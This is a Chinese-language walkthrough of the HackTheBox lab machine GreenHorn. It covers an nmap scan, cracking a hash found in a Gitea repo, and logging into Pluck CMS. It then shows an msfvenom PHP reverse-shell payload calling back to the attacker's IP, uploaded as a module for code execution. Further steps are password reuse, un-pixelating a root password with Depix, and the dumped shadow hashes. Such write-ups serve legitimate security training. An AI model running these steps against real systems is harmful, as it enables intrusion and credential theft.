GreenHorn - HackTheBox

基本信息

• https://app.hackthebox.com/machines/GreenHorn
• 10.10.11.25

端口扫描

22,80和3000:

$ nmap -sC -sV 10.10.11.25
Starting Nmap 7.95 ( https://nmap.org ) at 2024-07-22 13:18 CST
Nmap scan report for 10.10.11.25
Host is up (0.084s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 57:d6:92:8a:72:44:84:17:29:eb:5c:c9:63:6a:fe:fd (ECDSA)
|_  256 40:ea:17:b1:b6:c5:3f:42:56:67:4a:3c:ee:75:23:2f (ED25519)
80/tcp   open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://greenhorn.htb/
3000/tcp open  http    Golang net/http server
|_http-title: GreenHorn
| fingerprint-strings:
|   GenericLines, Help, RTSPRequest:
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest:
|     HTTP/1.0 200 OK
|     Cache-Control: max-age=0, private, must-revalidate, no-transform
|     Content-Type: text/html; charset=utf-8
|     Set-Cookie: i_like_gitea=ee699bcc2d0bb37e; Path=/; HttpOnly; SameSite=Lax
|     Set-Cookie: _csrf=BH-kKD9O3wOBao4BBBGjWM97jK06MTcyMTYyNTA0NTkyOTQ4NzM0Mg; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
|     X-Frame-Options: SAMEORIGIN
|     Date: Mon, 22 Jul 2024 05:10:45 GMT
|     <!DOCTYPE html>
|     <html lang="en-US" class="theme-auto">
|     <head>
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <title>GreenHorn</title>
|     <link rel="manifest" href="data:application/json;base64,eyJuYW1lIjoiR3JlZW5Ib3JuIiwic2hvcnRfbmFtZSI6IkdyZWVuSG9ybiIsInN0YXJ0X3VybCI6Imh0dHA6Ly9ncmVlbmhvcm4uaHRiOjMwMDAvIiwiaWNvbnMiOlt7InNyYyI6Imh0dHA6Ly9ncmVlbmhvcm4uaHRiOjMwMDAvYXNzZXRzL2ltZy9sb2dvLnBuZyIsInR5cGUiOiJpbWFnZS9wbmciLCJzaXplcyI6IjUxMng1MTIifSx7InNyYyI6Imh0dHA6Ly9ncmVlbmhvcm4uaHRiOjMwMDAvYX
|   HTTPOptions:
|     HTTP/1.0 405 Method Not Allowed
|     Allow: HEAD
|     Allow: GET
|     Cache-Control: max-age=0, private, must-revalidate, no-transform
|     Set-Cookie: i_like_gitea=1571841bebfea9ad; Path=/; HttpOnly; SameSite=Lax
|     Set-Cookie: _csrf=gO4Es5cWdtazkF8-MtO-k-q8t6Y6MTcyMTYyNTA0NjMwNDYxMDI5MQ; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
|     X-Frame-Options: SAMEORIGIN
|     Date: Mon, 22 Jul 2024 05:10:46 GMT
|_    Content-Length: 0
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3000-TCP:V=7.95%I=7%D=7/22%Time=669DEBBD%P=x86_64-apple-darwin23.4.
SF:0%r(GenericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type
SF::\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x2
SF:0Bad\x20Request")%r(GetRequest,2A60,"HTTP/1\.0\x20200\x20OK\r\nCache-Co
SF:ntrol:\x20max-age=0,\x20private,\x20must-revalidate,\x20no-transform\r\
SF:nContent-Type:\x20text/html;\x20charset=utf-8\r\nSet-Cookie:\x20i_like_
SF:gitea=ee699bcc2d0bb37e;\x20Path=/;\x20HttpOnly;\x20SameSite=Lax\r\nSet-
SF:Cookie:\x20_csrf=BH-kKD9O3wOBao4BBBGjWM97jK06MTcyMTYyNTA0NTkyOTQ4NzM0Mg
SF:;\x20Path=/;\x20Max-Age=86400;\x20HttpOnly;\x20SameSite=Lax\r\nX-Frame-
SF:Options:\x20SAMEORIGIN\r\nDate:\x20Mon,\x2022\x20Jul\x202024\x2005:10:4
SF:5\x20GMT\r\n\r\n<!DOCTYPE\x20html>\n<html\x20lang=\"en-US\"\x20class=\"
SF:theme-auto\">\n<head>\n\t<meta\x20name=\"viewport\"\x20content=\"width=
SF:device-width,\x20initial-scale=1\">\n\t<title>GreenHorn</title>\n\t<lin
SF:k\x20rel=\"manifest\"\x20href=\"data:application/json;base64,eyJuYW1lIj
SF:oiR3JlZW5Ib3JuIiwic2hvcnRfbmFtZSI6IkdyZWVuSG9ybiIsInN0YXJ0X3VybCI6Imh0d
SF:HA6Ly9ncmVlbmhvcm4uaHRiOjMwMDAvIiwiaWNvbnMiOlt7InNyYyI6Imh0dHA6Ly9ncmVl
SF:bmhvcm4uaHRiOjMwMDAvYXNzZXRzL2ltZy9sb2dvLnBuZyIsInR5cGUiOiJpbWFnZS9wbmc
SF:iLCJzaXplcyI6IjUxMng1MTIifSx7InNyYyI6Imh0dHA6Ly9ncmVlbmhvcm4uaHRiOjMwMD
SF:AvYX")%r(Help,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x
SF:20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Ba
SF:d\x20Request")%r(HTTPOptions,197,"HTTP/1\.0\x20405\x20Method\x20Not\x20
SF:Allowed\r\nAllow:\x20HEAD\r\nAllow:\x20GET\r\nCache-Control:\x20max-age
SF:=0,\x20private,\x20must-revalidate,\x20no-transform\r\nSet-Cookie:\x20i
SF:_like_gitea=1571841bebfea9ad;\x20Path=/;\x20HttpOnly;\x20SameSite=Lax\r
SF:\nSet-Cookie:\x20_csrf=gO4Es5cWdtazkF8-MtO-k-q8t6Y6MTcyMTYyNTA0NjMwNDYx
SF:MDI5MQ;\x20Path=/;\x20Max-Age=86400;\x20HttpOnly;\x20SameSite=Lax\r\nX-
SF:Frame-Options:\x20SAMEORIGIN\r\nDate:\x20Mon,\x2022\x20Jul\x202024\x200
SF:5:10:46\x20GMT\r\nContent-Length:\x200\r\n\r\n")%r(RTSPRequest,67,"HTTP
SF:/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20chars
SF:et=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 70.65 seconds

80

需要加hosts,是pluck：

10.10.11.25 greenhorn.htb

3000

是gitea，有一个公开访问的repo：

GreenHorn

pass.php中得到的hash可破解：

d5443aef1b64544f3685bf112f6c405218c573c7279a831b1fe9612e3a4d770486743c5580556c0d838b51749de15530f87fb793afdcc689b6b39024d7790163

iloveyou1

密码可以登录pluck：

pluck

pluck部分在Mist中出现过：

• Pluck v4.7.18 - Remote Code Execution (RCE) - PHP webapps Exploit
  https://www.exploit-db.com/exploits/51592

msfvenom -p php/meterpreter_reverse_tcp -f raw LHOST=10.10.14.12 LPORT=4444 -o miao.php

zip miao.zip miao.php

options -> manage modules -> install a module

http://greenhorn.htb/data/modules/miao/miao.php

得到www-data：

user flag

基础的密码重用，查看用户目录，junior重用了pluck密码：

su junior
iloveyou1

然后写公钥方便后续操作

提权信息

junior目录可以看到一个pdf，下载下来查看:

scp junior@10.10.11.25:/home/junior/'Using OpenVAS.pdf' .

pdf提到安装了sudo运行openvas，密码打码了：

所以如果消除马赛克，就能得到密码

Depix

可以使用这个获得打码的密码

• spipm/Depix: Recovers passwords from pixelized screenshots
  https://github.com/spipm/Depix

得到的虽然还有点模糊，但已经足够看出字符了

# pdf中提取出打码的密码部分png
sudo apt-get install poppler-utils
pdfimages -j Using\ OpenVAS.pdf output_prefix
mogrify -format png output_prefix-000.ppm

# depix
python3 depix.py -s images/searchimages/debruinseq_notepad_Windows10_closeAndSpaced.png -p ../output_prefix-000.png

side from side the other side side from side the other side

(中间部分码是自己打的)

root flag

得到的字符去掉空格就是root密码：

sidefromsidetheothersidesidefromsidetheotherside

shadow

root:$y$j9T$NSPhYbBCBMhifcNXubO4U0$KgghRp5OmEotPgUh6e0/Qcyl4dKNs7Q/Xo7bmXFe6//:19885:0:99999:7:::
junior:$y$j9T$4CuWc/4J0pSo/Ku4w039e.$VUAimmgaEYnbEZpMrwpNnaaLmm.fQaKGCtWux8McYpD:19891:0:99999:7:::

参考资料

• Pluck v4.7.18 - Remote Code Execution (RCE) - PHP webapps Exploit
  https://www.exploit-db.com/exploits/51592
• spipm/Depix: Recovers passwords from pixelized screenshots
  https://github.com/spipm/Depix